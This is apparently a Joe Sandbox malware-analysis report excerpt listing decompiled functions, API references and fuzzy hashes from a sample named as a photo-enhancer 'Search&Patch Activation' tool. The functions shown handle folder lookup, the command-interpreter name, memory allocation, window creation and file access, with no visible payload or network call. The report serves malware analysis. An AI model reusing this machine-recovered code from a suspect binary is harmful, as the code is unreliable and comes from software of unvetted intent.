				}
			}

0x00478d7d
0x00478d80
0x00478d83
0x00478d86
0x00478d8b
0x00478d91
0x00478d9f
0x00478da5
0x00000000
0x00478dac
0x00478db0
0x00478db6
0x00000000
0x00478db6

APIs

CallWindowProcW.USER32(6FB36C40,?,?,?,?), ref: 00478DA5
CallWindowProcW.USER32(FFFF0375,?,?,?,?), ref: 00478DB6

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: ce7ea350cd2d8a29d4756030a0e2150e6ff414cb3a27e593d77670a1272721e0
Instruction ID: ec977eba15decb799f6fff92ffb6f57cd97eebcf4dd56cd6945e1ca0977ddd56
Opcode Fuzzy Hash: ce7ea350cd2d8a29d4756030a0e2150e6ff414cb3a27e593d77670a1272721e0
Instruction Fuzzy Hash: A7F01CB21002146BDA109A69DD8DCA77B6CEF99260704862BBD18D7291D578AD008678

Uniqueness

Uniqueness Score: -1.00%

Function 0047EAC5 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0047EAC5() {
				void* _t10;
				intOrPtr _t11;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t36;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t42;

				_t10 =  *0x49f50c( &E0049CD58, 0x8000, 0, _t41 - 4); // executed
				if(_t10 != 0) {
					if( *0x49f445 == 0) {
						_t11 =  *0x49f194; // 0x230ec2c
						E0042C88C(_t11, _t41 - 8);
						E004035C0(0x49f1bc, "COMMAND.COM",  *((intOrPtr*)(_t41 - 8))); // executed
					} else {
						_t19 =  *0x49f198; // 0x2311090
						E0042C88C(_t19, _t41 - 8);
						E004035C0(0x49f1bc, "cmd.exe",  *((intOrPtr*)(_t41 - 8)));
					}
					E0047E814(); // executed
					_pop(_t36);
					 *[fs:eax] = _t36;
					_push(E0047EB83);
					return E00403400(_t41 - 8);
				} else {
					_push(_t41);
					_push(0x47eb11);
					_push( *[fs:eax]);
					 *[fs:eax] = _t42;
					E00403BA4();
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(E0047EB18);
					_t27 =  *((intOrPtr*)(_t41 - 4));
					_push(_t27);
					L0042D0E4();
					return _t27;
				}
			}

0x0047ead5
0x0047eadd
0x0047eb1f
0x0047eb45
0x0047eb4a
0x0047eb5c
0x0047eb21
0x0047eb24
0x0047eb29
0x0047eb3b
0x0047eb3b
0x0047eb61
0x0047eb68
0x0047eb6b
0x0047eb6e
0x0047eb7b
0x0047eadf
0x0047eae1
0x0047eae2
0x0047eae7
0x0047eaea
0x0047eaf5
0x0047eafc
0x0047eaff
0x0047eb02
0x0047eb07
0x0047eb0a
0x0047eb0b
0x0047eb10
0x0047eb10

APIs

SHGetKnownFolderPath.SHELL32(0049CD58,00008000,00000000,?), ref: 0047EAD5
770FA680.OLE32(?,0047EB18), ref: 0047EB0B

Strings

\Program Files, xrefs: 0047E997
ProgramFilesDir, xrefs: 0047E970, 0047E9F7
Failed to get path of 64-bit Common Files directory, xrefs: 0047EA48
Common Files, xrefs: 0047E9E1
COMMAND.COM, xrefs: 0047EB57
cmd.exe, xrefs: 0047EB36
SystemDrive, xrefs: 0047E90F
Failed to get path of 64-bit Program Files directory, xrefs: 0047EA19
CommonFilesDir, xrefs: 0047E9AA, 0047EA26

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: A680FolderKnownPath
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 330600242-544719455
Opcode ID: dcdb464d46d000a45e9e512131e32681938e3456e18d581bde74e904f3b66734
Instruction ID: 165899f7cf3a7d3cc2084f0fc85f54689cbe0ef7c4de0502b74dd13bf0a7d919
Opcode Fuzzy Hash: dcdb464d46d000a45e9e512131e32681938e3456e18d581bde74e904f3b66734
Instruction Fuzzy Hash: C9E06D31340640AEEB11CA629C12B597BA8EB89B14BA184B3F500E6694D679AE009A58

Uniqueness

Uniqueness Score: -1.00%

Function 00406274 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406274(int __eax, long __edx) {
				void* _t2;

				_t2 = GlobalAlloc(__eax, __edx); // executed
				GlobalFix(_t2);
				return _t2;
			}

0x00406276
0x0040627c
0x00406281

APIs

GlobalAlloc.KERNEL32 ref: 00406276
GlobalFix.KERNEL32 ref: 0040627C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Global$Alloc
String ID:
API String ID: 2558781224-0
Opcode ID: e4f7d9c809cc99a30bf6c56fb98a8e60525df4fbef9fe8bba13daf78f333b2b4
Instruction ID: 56019af84ea84d57b40f02c4528a45173e4f1cdf38a2be340d0d32551c2e1a06
Opcode Fuzzy Hash: e4f7d9c809cc99a30bf6c56fb98a8e60525df4fbef9fe8bba13daf78f333b2b4
Instruction Fuzzy Hash: 699002C4C01A00A4DC0072B20C0BD3F101CD8C072C3D1486F7044B6483887C88000979

Uniqueness

Uniqueness Score: -1.00%

Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014E4(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401398(0x49e440, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x004014e7
0x004014f1
0x00401500
0x004014f3
0x004014f3
0x004014f3
0x00401506
0x00401513
0x00401518
0x0040151a
0x0040151e
0x00401527
0x0040152e
0x0040153a
0x00401541
0x00000000
0x00401541
0x0040152e
0x00401546

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b520bc60e33c723c5354926e54c9cb4ec67acca134fd7c558003b77a2e03234b
Instruction ID: 9ed38fc533d8e4e5af650f240f956f2e356275670cbb68eb90ec247bb51ad9a4
Opcode Fuzzy Hash: b520bc60e33c723c5354926e54c9cb4ec67acca134fd7c558003b77a2e03234b
Instruction Fuzzy Hash: 27F0A772B0073067EB60596A4C81F5359C49FC5794F154076FD0DFF3E9D6B58C0142A9

Uniqueness

Uniqueness Score: -1.00%

Function 00408A6C Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00408A6C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				char _v16;
				char _v20;
				void* _t76;
				void* _t77;
				intOrPtr _t103;
				void* _t106;
				void* _t107;
				void* _t109;
				void* _t110;
				void* _t113;

				_v16 = 0;
				_v20 = 0;
				_push(_t113);
				_push(0x408ba2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffff0;
				_v12 = GetSystemDefaultLCID();
				_t76 = 1;
				_t109 = 0x49e4c4;
				_t106 = 0x49e4f4;
				do {
					_t6 = _t76 + 0xffbf; // 0xffc0
					E0040727C(_t6,  &_v20);
					_t8 = _t76 + 0x44; // 0x45
					E004089F8(_v12, _v20, _t8 - 1,  &_v16); // executed
					E00403450(_t109, _t76, _v16, _t106, _t109);
					_t13 = _t76 + 0xffcf; // 0xffd0
					E0040727C(_t13,  &_v20);
					_t15 = _t76 + 0x38; // 0x39
					E004089F8(_v12, _v20, _t15 - 1,  &_v16);
					E00403450(_t106, _t76, _v16, _t106, _t109);
					_t76 = _t76 + 1;
					_t106 = _t106 + 4;
					_t109 = _t109 + 4;
				} while (_t76 != 0xd);
				_t77 = 1;
				_t110 = 0x49e524;
				_t107 = 0x49e540;
				do {
					_t18 = _t77 + 5; // 0x6
					asm("cdq");
					_v8 = _t18 % 7;
					_t26 = _t77 + 0xffdf; // 0xffe0
					E0040727C(_t26,  &_v20);
					E004089F8(_v12, _v20, _v8 + 0x31,  &_v16);
					E00403450(_t110, _t77, _v16, _t107, _t110);
					_t33 = _t77 + 0xffe6; // 0xffe7
					E0040727C(_t33,  &_v20);
					E004089F8(_v12, _v20, _v8 + 0x2a,  &_v16);
					E00403450(_t107, _t77, _v16, _t107, _t110);
					_t77 = _t77 + 1;
					_t107 = _t107 + 4;
					_t110 = _t110 + 4;
				} while (_t77 != 8);
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00408BA9);
				return E00403420( &_v20, 2);
			}

0x00408a77
0x00408a7a
0x00408a7f
0x00408a80
0x00408a85
0x00408a88
0x00408a90
0x00408a93
0x00408a98
0x00408a9d
0x00408aa2
0x00408aa9
0x00408aaf
0x00408ab7
0x00408abe
0x00408ac8
0x00408ad4
0x00408ada
0x00408ae2
0x00408ae9
0x00408af3
0x00408af8
0x00408af9
0x00408afc
0x00408aff
0x00408b04
0x00408b09
0x00408b0e
0x00408b13
0x00408b13
0x00408b1b
0x00408b1e
0x00408b28
0x00408b2e
0x00408b3f
0x00408b49
0x00408b55
0x00408b5b
0x00408b6c
0x00408b76
0x00408b7b
0x00408b7c
0x00408b7f
0x00408b82
0x00408b89
0x00408b8c
0x00408b8f
0x00408ba1

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00408BA2), ref: 00408A8B

Part of subcall function 0040727C: LoadStringA.USER32 ref: 00407299

Part of subcall function 004089F8: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049E4C4,00000001,?,00408AC3,?,00000000,00408BA2), ref: 00408A16

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: e3bde22edff9b95fb01644fc2752e12edfd564b8e42cb00d732a26da313984e4
Instruction ID: 1a1ee965da3d5e477180f9d3e1b3e31d3a1d40cbd97d3d5e52e02950362564b9
Opcode Fuzzy Hash: e3bde22edff9b95fb01644fc2752e12edfd564b8e42cb00d732a26da313984e4
Instruction Fuzzy Hash: A7314F75E001099BCF00EB95C8819EEB779EF84314F51857BE814BB286E738AE458B99

Uniqueness

Uniqueness Score: -1.00%

Function 0042002C Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042002C(void* __eax, char __ecx, void* __edx) {
				struct tagSCROLLINFO _v44;
				intOrPtr _t28;
				void* _t40;
				void* _t48;
				signed short _t49;
				intOrPtr _t51;

				_t52 =  &(_v44.nMax);
				_v44.nMax = __ecx;
				_t40 = __edx;
				_t48 = __eax;
				 *((intOrPtr*)(__eax + 0x14)) = 0;
				_t49 = 0;
				if( *((char*)(__eax + 0x18)) == 1) {
					_t49 = 1;
				}
				if( *((char*)(_t48 + 0x1c)) != 0) {
					_t51 =  *((intOrPtr*)(_t48 + 0x10)) - E0041FDCC(_t48,  *_t52, _t40);
					 *((intOrPtr*)(_t48 + 0x14)) = _t51;
					if(_t51 < 0) {
						 *((intOrPtr*)(_t48 + 0x14)) = 0;
					}
				}
				_v44.cbSize = 0x1c;
				_v44.fMask = 0x17;
				_v44.nMin = 0;
				if( *((intOrPtr*)(_t48 + 0x14)) <= 0) {
					_v44.nMax = 0;
				} else {
					_v44.nMax =  *((intOrPtr*)(_t48 + 0x10));
				}
				_v44.nPage = E0041FDCC(_t48,  *_t52, _t40) + 1;
				_t28 =  *((intOrPtr*)(_t48 + 0xc));
				_v44.nPos = _t28;
				_v44.nTrackPos = _t28;
				SetScrollInfo(E00418670( *((intOrPtr*)(_t48 + 4))), _t49 & 0x0000ffff,  &_v44, 1); // executed
				return E0041FF2C(_t48,  *((intOrPtr*)(_t48 + 0xc)));
			}

0x00420030
0x00420033
0x00420036
0x00420038
0x0042003c
0x0042003f
0x00420045
0x00420047
0x00420047
0x0042004f
0x00420060
0x00420062
0x00420067
0x0042006b
0x0042006b
0x00420067
0x0042006e
0x00420076
0x00420080
0x00420088
0x00420095
0x0042008a
0x0042008d
0x0042008d
0x004200a6
0x004200aa
0x004200ad
0x004200b1
0x004200c9
0x004200df

APIs

SetScrollInfo.USER32(00000000,?,?,00000001), ref: 004200C9

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: InfoScroll
String ID:
API String ID: 629608716-0
Opcode ID: 4038a9721f8deaf5412c4e17f668d42a633933aac620105991029e29eea6c581
Instruction ID: fb0b6b32162d284d5e4e4472e465846aa9f3b1678ed1a2f027c040ff7edaf6c0
Opcode Fuzzy Hash: 4038a9721f8deaf5412c4e17f668d42a633933aac620105991029e29eea6c581
Instruction Fuzzy Hash: 4E214FB1604755AFD340DF39A44076ABBE4BB48314F04892EE098C3341E779E995CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 004169E0 Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004169E0(void* __eax, CHAR** __edx) {
				struct HINSTANCE__* _t13;
				struct HWND__* _t23;
				void* _t26;

				_t26 = __eax;
				_t13 =  *0x49e014; // 0x400000
				_t23 = CreateWindowExA(__edx[2],  &(__edx[0x13]),  *__edx, __edx[1], __edx[3], __edx[4], __edx[5], __edx[6], __edx[7], 0, _t13, __edx[8]); // executed
				 *(_t26 + 0xc0) = _t23;
				return _t23;
			}

0x004169e4
0x004169ea
0x00416a15
0x00416a1a
0x00416a22

APIs

CreateWindowExA.USER32 ref: 00416A15

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 66225c5018934712ca213f7cbc9da523afb779e1f1452fe3fdaea1241b34de43
Instruction ID: 5ef094d12f7d71e5830b73219e88c414bb2d46ce683ba0b40c209d6d3be90de3
Opcode Fuzzy Hash: 66225c5018934712ca213f7cbc9da523afb779e1f1452fe3fdaea1241b34de43
Instruction Fuzzy Hash: 26F025B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD261EC108BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00414E44 Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00414E44(intOrPtr* __eax, void* __edx) {
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v28;
				intOrPtr _v32;
				intOrPtr* _t31;

				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *__eax + 0x2c))();
				_push( *((intOrPtr*)(__eax + 0x2c)) - _v20 +  *_t31);
				_push( *((intOrPtr*)(__eax + 0x30)) - _v16 + _v32);
				return  *((intOrPtr*)( *__eax + 0x4c))();
			}

0x00414e4f
0x00414e50
0x00414e5b
0x00414e68
0x00414e74
0x00414e88

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 00414E7F

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00450F9C Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00450F9C(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t20;

				_t20 = CreateFileA(E00403738(__edx),  *0x0049C9F0,  *0x0049C9FC, 0,  *0x0049CA0C, 0x80, 0); // executed
				return _t20;
			}

0x00450fdc
0x00450fe4

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450FDC

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 724ae1468d06d2a46712d5b9868f6ea52c04c69a058dc852d8341962a3bca91f
Instruction ID: 0bb8bc98a2ce5191ccdfd632eb20aa7c5cb2b99e9b0e2766e1f3384ce1d09118
Opcode Fuzzy Hash: 724ae1468d06d2a46712d5b9868f6ea52c04c69a058dc852d8341962a3bca91f
Instruction Fuzzy Hash: 28E092B13401483ED340DFAC7C81F9237CC931A314F008033B948D7241C4619D118BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0042D15C Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E0042D15C(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t26;

				_push(0);
				_push(_t26);
				_push(0x42d1a4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26;
				E0042D050(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesA(E00403738(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E0042D1AB);
				return E00403400( &_v8);
			}

0x0042d15f
0x0042d168
0x0042d169
0x0042d16e
0x0042d171
0x0042d179
0x0042d187
0x0042d190
0x0042d193
0x0042d196
0x0042d1a3

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,0042D1A4,?,00000001,?,?,00000000,?,0042D1F6,00000000,004531FD,00000000,0045321E,?,00000000), ref: 0042D187

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a944933b7e94ac2da4548c012b878e77f53d3e7fac6ad7ed32738dad81323317
Instruction ID: 90f30b3d4511ddb26d4e54eb5cb5bde7ef97429f4a5987d97ea56347c6c51953
Opcode Fuzzy Hash: a944933b7e94ac2da4548c012b878e77f53d3e7fac6ad7ed32738dad81323317
Instruction Fuzzy Hash: C0E09B71704344BFD701FF62DC53E5ABBECDB49714BA14476B404D7691D5785E10C468

Uniqueness

Uniqueness Score: -1.00%

Function 0042ED58 Relevance: 1.5, APIs: 1, Instructions: 28
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042ED58(long __eax, void* __edx) {
				char _v1028;
				long _t6;
				void* _t9;
				intOrPtr _t15;
				void* _t16;

				_t9 = __edx;
				_t6 = FormatMessageA(0x3200, 0, __eax, 0,  &_v1028, 0x400, 0); // executed
				while(_t6 > 0) {
					_t15 =  *((intOrPtr*)(_t16 + _t6 - 1));
					if(_t15 <= 0x20) {
						L1:
						_t6 = _t6 - 1;
						__eflags = _t6;
						continue;
					} else {
						_t19 = _t15 - 0x2e;
						if(_t15 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E004034E0(_t9, _t6, _t16, _t19);
			}

0x0042ed5f
0x0042ed77
0x0042ed7f
0x0042ed83
0x0042ed8a
0x0042ed7e
0x0042ed7e
0x0042ed7e
0x00000000
0x0042ed8c
0x0042ed8c
0x0042ed8f
0x00000000
0x00000000
0x0042ed8f
0x00000000
0x0042ed8a
0x0042eda2

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453A6B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042ED77

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 1828867668d4f08c7f2c42ac7f7c8b165bd44dc6f1d36d1d73a42743962ef3e6
Instruction ID: e79f09bbc4d4bb3d85d444e79d719d693aec0fec5ee663d6819558c24f001612
Opcode Fuzzy Hash: 1828867668d4f08c7f2c42ac7f7c8b165bd44dc6f1d36d1d73a42743962ef3e6
Instruction Fuzzy Hash: F1E0206179471226F23515566C43B77160E43C0704F94403A7F40DD3D3D6AE9906425E

Uniqueness

Uniqueness Score: -1.00%

Function 00406300 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406300(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}

0x00406329
0x00406330

APIs

CreateWindowExA.USER32 ref: 00406329

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

